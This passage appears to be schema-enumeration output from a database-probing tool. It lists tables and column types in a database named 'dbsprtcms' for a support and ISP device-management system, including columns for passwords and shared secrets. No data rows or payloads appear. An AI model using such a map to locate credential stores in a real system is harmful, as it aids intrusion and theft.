| pSV_HTTP_ACCEPT_LANGUAGE | nvarchar |
| pSV_HTTP_CONNECTION | nvarchar |
| pSV_HTTP_HOST | nvarchar |
| pSV_HTTP_REFERER | nvarchar |
| pSV_HTTP_USER_AGENT | nvarchar |
| pSV_HTTPS | nvarchar |
| pSV_INSTANCE_ID | nvarchar |
| pSV_INSTANCE_META_PATH | nvarchar |
| pSV_LOCAL_ADDR | nvarchar |
| pSV_PATH_INFO | nvarchar |
| pSV_PATH_TRANSLATED | nvarchar |
| pSV_REMOTE_ADDR | nvarchar |
| pSV_REMOTE_HOST | nvarchar |
| pSV_REQUEST_METHOD | nvarchar |
| pSV_SCRIPT_NAME | nvarchar |
| pSV_SERVER_NAME | nvarchar |
| pSV_SERVER_PORT | nvarchar |
| pSV_SERVER_PORT_SECURE | nvarchar |
| pSV_SERVER_PROTOCOL | nvarchar |
| pSV_SERVER_SOFTWARE | nvarchar |
| pSV_URL | nvarchar |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_agent_profiles
[3 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| client_guid | char |
| profile_attr | nvarchar |
| user_guid | nvarchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_upload_log
[12 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| nc_ul_command_key | nvarchar |
| nc_ul_delay_seconds | nvarchar |
| nc_ul_end_time | datetime |
| nc_ul_fault_code | nvarchar |
| nc_ul_fault_string | nvarchar |
| nc_ul_file_type | nvarchar |
| nc_ul_password | nvarchar |
| nc_ul_request_guid | char |
| nc_ul_start_time | datetime |
| nc_ul_status | int |
| nc_ul_url | nvarchar |
| nc_ul_user_name | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_concurrency_rpt
[10 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| chcon_analyst | nvarchar |
| chcon_interval_length | int |
| chcon_interval_start_time | datetime |
| chcon_interval_type | char |
| chcon_time1 | float |
| chcon_time2 | float |
| chcon_time3 | float |
| chcon_time4 | float |
| chcon_time_available | float |
| chcon_time_logged_in | float |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_FloppyDrive
[6 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pManufacturer | nvarchar |
| pName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.SMA_configure_thomson
[4 columns]
+--------------------------------+----------+
| Column | Type |
+--------------------------------+----------+
| elementNum | int |
| incidentID | char |
| presult | nvarchar |
| pSMA_configure_thomson_Binding | nvarchar |
+--------------------------------+----------+
Database: dbsprtcms
Table: dbo.old_sprt_chat_analyst_counter
[23 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| cac_analyst_name | nvarchar |
| cac_data1 | nvarchar |
| cac_data2 | nvarchar |
| cac_event | char |
| cac_event_data | nvarchar |
| cac_event_time | datetime |
| cac_id | int |
| cac_modified_time | datetime |
| cac_no1 | int |
| cac_no2 | int |
| cac_no_auto_escalatation | int |
| cac_no_chat_handled | int |
| cac_no_escalated_in | int |
| cac_no_escalated_out | int |
| cac_no_win_available | int |
| cac_no_win_open | int |
| cac_no_win_working | int |
| cac_session_guid | char |
| cac_session_time | datetime |
| cac_time1 | datetime |
| cac_total_handle_time | bigint |
| cac_total_time_available | bigint |
| cac_window | int |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_rotated_hsd
[11 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| svtr_cmrxpower | float |
| svtr_cmrxpower_ryg | int |
| svtr_cmrxsnr | float |
| svtr_cmrxsnr_ryg | int |
| svtr_cmtsrxpower | float |
| svtr_cmtsrxsnr | float |
| svtr_cmtsrxsnr_ryg | int |
| svtr_cmtxpower | float |
| svtr_cmtxpower_ryg | int |
| svtr_service_device_guid | char |
| svtr_uptime | nvarchar |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_copylink_codes
[4 columns]
+---------------+------+
| Column | Type |
+---------------+------+
| sccc_ct | char |
| sccc_lg | char |
| sccc_row_guid | char |
| sccc_seg | char |
+---------------+------+
Database: dbsprtcms
Table: dbo.sprt_patch_link_patchproduct
[4 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| splp_patch_guid | char |
| splp_row_guid | char |
| splp_spp_fixedinsp_id | int |
| splp_spp_link_guid | char |
+-----------------------+------+
Database: dbsprtcms
Table: dbo.SDCAsset_PointingDevice
[7 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pHardwareType | nvarchar |
| pManufacturer | nvarchar |
| pName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_CDROMDrive
[8 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pDrive | nvarchar |
| pManufacturer | nvarchar |
| pMediaType | nvarchar |
| pName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_report_schedule
[7 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| srsc_enabled | int |
| srsc_format | nvarchar |
| srsc_parameter | ntext |
| srsc_report_guid | char |
| srsc_schedule_guid | char |
| srsc_task_guid | char |
| srsc_to_list | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ldap_sync
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| sls_desc | nvarchar |
| sls_domain | nvarchar |
| sls_id | int |
| sls_name | nvarchar |
| sls_os_name | nvarchar |
| sls_os_sp | nvarchar |
| sls_os_version | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_script_agentdata_map
[3 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| agm_agentdata_guid | char |
| agm_map_type | nvarchar |
| agm_script_guid | char |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_download
[16 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| nc_dl_command_key | nvarchar |
| nc_dl_delay_seconds | nvarchar |
| nc_dl_end_time | datetime |
| nc_dl_failure_url | nvarchar |
| nc_dl_fault_code | nvarchar |
| nc_dl_fault_string | nvarchar |
| nc_dl_file_size | nvarchar |
| nc_dl_file_type | nvarchar |
| nc_dl_password | nvarchar |
| nc_dl_request_guid | char |
| nc_dl_start_time | datetime |
| nc_dl_status | int |
| nc_dl_success_url | nvarchar |
| nc_dl_target_file_name | nvarchar |
| nc_dl_url | nvarchar |
| nc_dl_user_name | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_AdditionalSysInfo
[14 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| elementNum | int |
| incidentID | char |
| pMemoryLoad | nvarchar |
| pName | nvarchar |
| pNumberOfProcessors | nvarchar |
| pPageFileAvailable | nvarchar |
| pPageFileInitialSize | nvarchar |
| pPageFileMaxSize | nvarchar |
| pPageFileTotal | nvarchar |
| pProcessor | nvarchar |
| pProcessorArchitecture | nvarchar |
| pProcessorLevel | nvarchar |
| pProcessorRevision | nvarchar |
| pProcessorType | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_task_parameters
[5 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| param_name | nvarchar |
| param_server_mask | nvarchar |
| param_value | nvarchar |
| task_name | nvarchar |
| task_row_guid | char |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_servicepacks
[3 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| sps_name | nvarchar |
| sps_sp_guid | char |
| sps_sp_id | int |
+-------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_productfamily
[4 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| sppf_family_id | int |
| sppf_family_name | nvarchar |
| sppf_recent_version_id | int |
| sppf_row_guid | char |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_Printers
[5 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| elementNum | int |
| incidentID | char |
| pPrinter | nvarchar |
| pServer | nvarchar |
| pType | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.sprt_user_brand_elements
[7 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| default_value | nvarchar |
| elem_guid | char |
| elem_name | nvarchar |
| elem_type | nvarchar |
| location | nvarchar |
| long_description | nvarchar |
| short_description | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_type_verb_backup15jun
[11 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| scctv_alttext | nvarchar |
| scctv_attr_mask | int |
| scctv_class | nchar |
| scctv_content_type_guid | char |
| scctv_img | nvarchar |
| scctv_imgdim | nvarchar |
| scctv_perm_mask | int |
| scctv_row_guid | char |
| scctv_sortorder | int |
| scctv_url | nvarchar |
| scctv_verb | nchar |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_purge_propdata
[15 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| sipp_class_guid | char |
| sipp_classdescription | nvarchar |
| sipp_classinstance | nvarchar |
| sipp_dp_valdate | datetime |
| sipp_dp_valimage | image |
| sipp_dp_valint | int |
| sipp_dp_valnvarchar | nvarchar |
| sipp_iss_guid | char |
| sipp_property_guid | char |
| sipp_propertyname | nvarchar |
| sipp_propertytype | int |
| sipp_submission_max_rev | int |
| sipp_submission_rev | int |
| sipp_submission_rev_opid | char |
| sipp_submission_rev_time | datetime |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.PCH_SysInfo
[10 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| elementNum | int |
| incidentID | char |
| pClockSpeed | int |
| pOSName | nvarchar |
| pOSVersion | nvarchar |
| pProcessor | nvarchar |
| pRAM | decimal |
| pSwapFile | nvarchar |
| pSystemID | nvarchar |
| pWindowsDirectory | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_geography_levels
[3 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| svgl_level_guid | char |
| svgl_name | nvarchar |
| svgl_order | int |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.SDC_Survey
[8 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| elementNum | int |
| incidentID | char |
| pContactEmail | nvarchar |
| pHelpful | nvarchar |
| pProblemSolved | nvarchar |
| pRecommendation | nvarchar |
| pSatisfactionLevel | nvarchar |
| pSDC_Survey_Binding | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_prop_datapoints
[14 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| sip_class_guid | char |
| sip_classinstance | nvarchar |
| sip_dp_valdate | datetime |
| sip_dp_valimage | image |
| sip_dp_valint | int |
| sip_dp_valnvarchar | nvarchar |
| sip_iss_guid | char |
| sip_property_guid | char |
| sip_propertytype | int |
| sip_rowguid | char |
| sip_submission_max_rev | int |
| sip_submission_rev | int |
| sip_submission_rev_opid | char |
| sip_submission_rev_time | datetime |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sasv_workorder
[4 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| svw_datetime | datetime |
| svw_pass | nvarchar |
| svw_techid | nvarchar |
| svw_workorder | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.SMA_firmware_update
[13 columns]
+------------------------------+----------+
| Column | Type |
+------------------------------+----------+
| elementNum | int |
| incidentID | char |
| pacs_url | nvarchar |
| pfirmware_upgrade_status | nvarchar |
| pfirmware_url | nvarchar |
| phardware_version | nvarchar |
| pnew_firmware_version | nvarchar |
| pold_firmware_version | nvarchar |
| pset_acs_url | nvarchar |
| pshared_secrets | nvarchar |
| pSMA_firmware_update_Binding | nvarchar |
| ptr69_compliant | nvarchar |
| pupgrade_exists | nvarchar |
+------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_tmp_classpropsndefaults
[19 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| classAttributes | int |
| classDescription | nvarchar |
| classID | nchar |
| clclpsipdef_row_guid | char |
| columnId | int |
| CpObjectID | char |
| objectID | nchar |
| propertyAttributes | int |
| propertyDescription | nvarchar |
| propertyName | nvarchar |
| propertyOrder | int |
| propertySize | int |
| propertyTable | nvarchar |
| propertyType | int |
| sipd_harvestscript | nvarchar |
| sipd_max_revisions | int |
| sipd_propid | char |
| sipd_propinputtype | nvarchar |
| tableName | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_snippet
[6 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| category | nvarchar |
| data | ntext |
| data_length | int |
| name | nvarchar |
| snippet_guid | char |
| snippet_id | int |
+--------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Printers
[5 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| elementNum | int |
| incidentID | nchar |
| pPrinter | nvarchar |
| pServer | nvarchar |
| pType | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_type_class_prop
[4 columns]
+---------------------+------+
| Column | Type |
+---------------------+------+
| adtc_asset_class_id | char |
| adtc_asset_type_id | char |
| adtc_class_prop_id | char |
| adtc_row_guid | char |
+---------------------+------+
Database: dbsprtcms
Table: dbo.sprt_si_channels
[12 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| sich_attributes | nvarchar |
| sich_comment | nvarchar |
| sich_exec | nvarchar |
| sich_guid | char |
| sich_html | ntext |
| sich_iss_type | char |
| sich_name | nvarchar |
| sich_order | int |
| sich_site | nvarchar |
| sich_state | char |
| sich_timings | nvarchar |
| sich_viewtype | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_workorders
[9 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| svw_account_number | nvarchar |
| svw_attempt_number | int |
| svw_call_type | nvarchar |
| svw_end_date | datetime |
| svw_geography | nvarchar |
| svw_start_date | datetime |
| svw_technician_id | nvarchar |
| svw_workorder | nvarchar |
| svw_workorder_ryg | int |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sma_commands
[4 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| smac_cmd_guid | char |
| smac_cmd_id | int |
| smac_cmd_method | nvarchar |
| smac_cmd_name | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_UninstallApp
[4 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDisplayName | nvarchar |
| pUninstallRegKey | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_apps_dict
[4 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| adad_apps_description | nvarchar |
| adad_apps_id | char |
| adad_apps_name | nvarchar |
| adad_apps_version | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_group_permission
[8 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| group_guid | char |
| group_id | int |
| group_permission_guid | char |
| permission_guid | char |
| permission_id | int |
| tier_id | nvarchar |
| user_id | int |
| value | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_properties
[7 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| class | nvarchar |
| friendly_name | nvarchar |
| instance | nvarchar |
| property | nvarchar |
| property_guid | char |
| property_id | int |
| property_key | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_rotated_sma
[13 columns]
+--------------------------------+-------+
| Column | Type |
+--------------------------------+-------+
| svtr_DownstreamAttenuation | float |
| svtr_DownstreamAttenuation_ryg | int |
| svtr_DownstreamPower | float |
| svtr_DownstreamPower_ryg | int |
| svtr_DownstreamSNR | float |
| svtr_DownstreamSNR_ryg | int |
| svtr_service_device_guid | char |
| svtr_UpstreamAttenuation | float |
| svtr_UpstreamAttenuation_ryg | int |
| svtr_UpstreamPower | float |
| svtr_UpstreamPower_ryg | int |
| svtr_UpstreamSNR | float |
| svtr_UpstreamSNR_ryg | int |
+--------------------------------+-------+
Database: dbsprtcms
Table: dbo.SDCAsset_User
[4 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| elementNum | int |
| incidentID | nchar |
| pName | nvarchar |
| pUserName | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Lnk
[12 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pCompanyName | nvarchar |
| pExeDir | nvarchar |
| pExeFilename | nvarchar |
| pFileDescription | nvarchar |
| pFileVersion | nvarchar |
| pLnkDescription | nvarchar |
| pLnkDisplayName | nvarchar |
| pLnkFolder | nvarchar |
| pProductName | nvarchar |
| pProductVersion | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_xml_languagemap
[4 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| scxl_input_code | char |
| scxl_language | nvarchar |
| scxl_row_guid | char |
| scxl_search_code | char |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_apps_dict_prop
[4 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| addp_apps_id | char |
| addp_file_name | nvarchar |
| addp_file_version | nvarchar |
| addp_prop_id | char |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_systune_interactive_usage
[8 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| stiu_after | nvarchar |
| stiu_before | nvarchar |
| stiu_content_guid | char |
| stiu_content_version | int |
| stiu_datetime | datetime |
| stiu_related_name | nvarchar |
| stiu_row_guid | char |
| stiu_session_guid | char |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_rotated_hsddsl
[72 columns]
+----------------------------+----------+
| Column | Type |
+----------------------------+----------+
| svtr_Address | nvarchar |
| svtr_AdminDomain | nvarchar |
| svtr_AvailableFirmware | nvarchar |
| svtr_CanRebootDevice | nvarchar |
| svtr_CanSetNATStatus | nvarchar |
| svtr_CanSetWLANChannel | nvarchar |
| svtr_CanSetWLANSSID | nvarchar |
| svtr_CanSetWLANStatus | nvarchar |
| svtr_CanUpgradeFirmware | nvarchar |
| svtr_City | nvarchar |
| svtr_ConnectionType | nvarchar |
| svtr_Custom1 | nvarchar |
| svtr_Custom1_ryg | int |
| svtr_Custom2 | nvarchar |
| svtr_Custom2_ryg | int |
| svtr_Custom3 | nvarchar |
| svtr_Custom3_ryg | int |
| svtr_Custom4 | float |
| svtr_Custom4_ryg | int |
| svtr_Custom5 | float |
| svtr_Custom5_ryg | int |
| svtr_Custom6 | float |
| svtr_Custom6_ryg | int |
| svtr_DeviceClass | nvarchar |
| svtr_DeviceType | nvarchar |
| svtr_DPFailureReason | nvarchar |
| svtr_DPStatus | nvarchar |
| svtr_DPStatus_ryg | int |
| svtr_DSAttenuation | float |
| svtr_DSAttenuation_ryg | int |
| svtr_DSCurrRate | float |
| svtr_DSCurrRatePercent | float |
| svtr_DSCurrRatePercent_ryg | int |
| svtr_DSMaxRate | float |
| svtr_DSPower | float |
| svtr_DSPower_ryg | int |
| svtr_DSSNR | float |
| svtr_DSSNR_ryg | int |
| svtr_FirmwareVersion | nvarchar |
| svtr_FirmwareVersion_ryg | int |
| svtr_HasNAT | nvarchar |
| svtr_HasWLAN | nvarchar |
| svtr_IPAddress | nvarchar |
| svtr_LKGWLANChannel | int |
| svtr_LKGWLANSSID | nvarchar |
| svtr_Manufacturer | nvarchar |
| svtr_MatchingChannel | nvarchar |
| svtr_MatchingSSID | nvarchar |
| svtr_Name | nvarchar |
| svtr_NATStatus | nvarchar |
| svtr_NATStatus_ryg | int |
| svtr_PhoneNumber | nvarchar |
| svtr_PostalCode | nvarchar |
| svtr_PPPUsername | nvarchar |
| svtr_service_device_guid | char |
| svtr_Services | nvarchar |
| svtr_State | nvarchar |
| svtr_UniqueDeviceID | nvarchar |
| svtr_USAttenuation | float |
| svtr_USAttenuation_ryg | int |
| svtr_USCurrRate | float |
| svtr_USCurrRatePercent | float |
| svtr_USCurrRatePercent_ryg | int |
| svtr_USMaxRate | float |
| svtr_USPower | float |
| svtr_USPower_ryg | int |
| svtr_USSNR | float |
| svtr_USSNR_ryg | int |
| svtr_WLANChannel | int |
| svtr_WLANPossibleChannels | nvarchar |
| svtr_WLANSSID | nvarchar |
| svtr_WLANStatus | nvarchar |
+----------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_group_message
[4 columns]
+--------------+------+
| Column | Type |
+--------------+------+
| group_guid | char |
| group_id | int |
| message_guid | char |
| message_id | int |
+--------------+------+
Database: dbsprtcms
Table: dbo.Win32_OperatingSystem
[7 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| elementNum | int |
| incidentID | char |
| pName | nvarchar |
| pOSName | nvarchar |
| pOSType | nvarchar |
| pOSVersion | nvarchar |
| pSvcPack | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cts_log
[6 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| scl_ctsconfig_id | nvarchar |
| scl_log_by | nvarchar |
| scl_log_event | nvarchar |
| scl_log_level | nvarchar |
| scl_log_msg | nvarchar |
| scl_log_timestamp | datetime |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_Connectivity
[8 columns]
+--------------------------------+----------+
| Column | Type |
+--------------------------------+----------+
| elementNum | int |
| incidentID | char |
| psma_con_checkdisabledadapters | nvarchar |
| psma_con_checktcpipbinding | nvarchar |
| psma_con_detectmodem | nvarchar |
| psma_con_ipreleaserenew | nvarchar |
| psma_con_verifydhcp | nvarchar |
| pSMA_Connectivity_Binding | nvarchar |
+--------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_script_groups
[5 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| csgname | nvarchar |
| csgscript_group | int |
| csgscript_group_attrib | int |
| csgscript_group_guid | char |
| csgsgdescriptions | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_cpe
[18 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| nc_cpe_boot_time | datetime |
| nc_cpe_config | nvarchar |
| nc_cpe_connection | int |
| nc_cpe_guid | char |
| nc_cpe_hardware_version | char |
| nc_cpe_http_get_url | nvarchar |
| nc_cpe_manufacturer | nvarchar |
| nc_cpe_maxenvelopes | int |
| nc_cpe_oui | nvarchar |
| nc_cpe_parameters | nvarchar |
| nc_cpe_periodic_time | datetime |
| nc_cpe_product_class | nvarchar |
| nc_cpe_prov_code | char |
| nc_cpe_serial_number | nvarchar |
| nc_cpe_serviceclass | nvarchar |
| nc_cpe_software_version | char |
| nc_cpe_spec_version | char |
| nc_cpe_wan_ip | nvarchar |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_log_archive
[7 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| id | int |
| logged | datetime |
| message_from | nvarchar |
| message_text | nvarchar |
| message_to | nvarchar |
| message_type | nvarchar |
| room | varchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_persistent
[3 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| ssp_content_guid | char |
| ssp_date | datetime |
| ssp_row_guid | char |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sym_UpdateIdInfo
[4 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| SourceId | nvarchar |
| TargetId | nvarchar |
| UpdatedBy | nvarchar |
| UpdatedOn | datetime |
+-----------+----------+
Database: dbsprtcms
Table: dbo.sym_product_listing
[1 column]
+----------+-------+
| Column | Type |
+----------+-------+
| prodName | nchar |
+----------+-------+
Database: dbsprtcms
Table: dbo.SDCAsset_Memory
[4 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pName | nvarchar |
| pTotalPhysicalMemory | decimal |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_transactions
[8 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| svt_account_number | nvarchar |
| svt_call_type | nvarchar |
| svt_service_type | nvarchar |
| svt_technician_id | nvarchar |
| svt_transaction_date | datetime |
| svt_transaction_guid | char |
| svt_transaction_pass | int |
| svt_work_order | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_agent_fanoutservers
[10 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| saf_checkindate | datetime |
| saf_client_ip_range | nvarchar |
| saf_clients | int |
| saf_guid | char |
| saf_ip_address | nvarchar |
| saf_last_upload | datetime |
| saf_name | nvarchar |
| saf_pip_address | nvarchar |
| saf_status | int |
| saf_url | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_sysprop_data
[22 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| sisp_class_guid | char |
| sisp_classinstance | nvarchar |
| sisp_dp_valdate_1 | datetime |
| sisp_dp_valdate_2 | datetime |
| sisp_dp_valdate_3 | datetime |
| sisp_dp_valimage | image |
| sisp_dp_valint_1 | int |
| sisp_dp_valint_2 | int |
| sisp_dp_valint_3 | int |
| sisp_dp_valnvarchar_1 | nvarchar |
| sisp_dp_valnvarchar_2 | nvarchar |
| sisp_dp_valnvarchar_3 | nvarchar |
| sisp_dp_valnvarchar_4 | nvarchar |
| sisp_dp_valnvarchar_5 | nvarchar |
| sisp_dp_valnvarchar_6 | nvarchar |
| sisp_iss_guid | char |
| sisp_property_guid | char |
| sisp_rowguid | char |
| sisp_submission_max_rev | int |
| sisp_submission_rev | int |
| sisp_submission_rev_opid | char |
| sisp_submission_rev_time | datetime |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ht_feature_property
[5 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| code | nvarchar |
| editable | nvarchar |
| feature_property_guid | char |
| property | nvarchar |
| value | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sym_g_ctlg_mapping
[2 columns]
+----------+-------+
| Column | Type |
+----------+-------+
| CtLgCode | nchar |
| gLgCode | nchar |
+----------+-------+
Database: dbsprtcms
Table: dbo.sprt_groups
[6 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| descriptions | nvarchar |
| group_guid | char |
| group_id | int |
| group_name | nvarchar |
| group_type | varchar |
| keywords | nvarchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.SDC_ContactInfo
[10 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| elementNum | int |
| incidentID | nchar |
| pChannel | nvarchar |
| pChannelGroup | nvarchar |
| pChannelGroupId | nvarchar |
| pChannelId | nvarchar |
| pChannelText | nvarchar |
| pDescription | nvarchar |
| pFirstName | nvarchar |
| pLastName | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_lotusnotes_import_log
[6 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| content_guid | varchar |
| date | datetime |
| description | varchar |
| filename | nvarchar |
| id | int |
| type | varchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ea_sent
[16 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| seas_att_msg_guid | char |
| seas_bcc | varchar |
| seas_body_text | text |
| seas_cc | varchar |
| seas_charset | varchar |
| seas_from | varchar |
| seas_headers | varchar |
| seas_id | int |
| seas_notafter | datetime |
| seas_notbefore | datetime |
| seas_reason | varchar |
| seas_sent | datetime |
| seas_status | char |
| seas_subject | nvarchar |
| seas_to | varchar |
| seas_type | int |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_prop_defaults
[4 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| sipd_harvestscript | nvarchar |
| sipd_max_revisions | int |
| sipd_propid | char |
| sipd_propinputtype | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_NetworkCheck
[7 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| elementNum | int |
| incidentID | char |
| pactivation_Date_Checked | nvarchar |
| pfilters_Checked | nvarchar |
| pModem_Power_Cycle | nvarchar |
| pphone_Line_checked | nvarchar |
| pSMA_NetworkCheck_Binding | nvarchar |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_ModemInfo
[12 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| elementNum | int |
| incidentID | char |
| pcode | nvarchar |
| pconn_type | nvarchar |
| pdetect_status | nvarchar |
| pinstallusbdrivers | nvarchar |
| pmodem_type | nvarchar |
| pname | nvarchar |
| pserver_status | nvarchar |
| pSMA_ModemInfo_Binding | nvarchar |
| psync_status | nvarchar |
| pusbsupported | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_technicians
[6 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| svtn_active | char |
| svtn_data_source | nvarchar |
| svtn_id | nvarchar |
| svtn_install_box | nvarchar |
| svtn_row_guid | char |
| svtn_user_guid | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_analyst_assist
[8 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| assist_id | int |
| comments | nvarchar |
| end_time | datetime |
| smartissue_guid | nvarchar |
| start_time | datetime |
| status | nvarchar |
| user_id | int |
| user_name | nvarchar |
+-----------------+----------+
